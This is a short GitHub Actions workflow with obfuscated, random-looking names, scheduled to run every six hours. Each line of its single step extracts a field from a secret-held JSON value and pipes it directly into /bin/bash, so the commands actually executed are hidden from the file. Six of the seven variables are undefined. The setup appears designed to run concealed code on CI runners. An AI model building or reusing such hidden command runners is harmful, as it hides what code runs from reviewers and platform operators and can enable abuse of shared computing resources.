name: guoshantui4678
on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: guoshantui4678
        env:
          lsbgf96: ${{ secrets.lsbgf96 }}
        run: |
          echo $lsbgf96 | jq -r .uzjt8717 | /bin/bash
          echo $ksexy3 | jq -r .ky49 | /bin/bash
          echo $vz7647 | jq -r .hsd0588 | /bin/bash
          echo $yougp1 | jq -r .ik2438 | /bin/bash
          echo $l37733 | jq -r .krl8 | /bin/bash
          echo $zbh98 | jq -r .byu1862 | /bin/bash
          echo $v8 | jq -r .ghl682 | /bin/bash

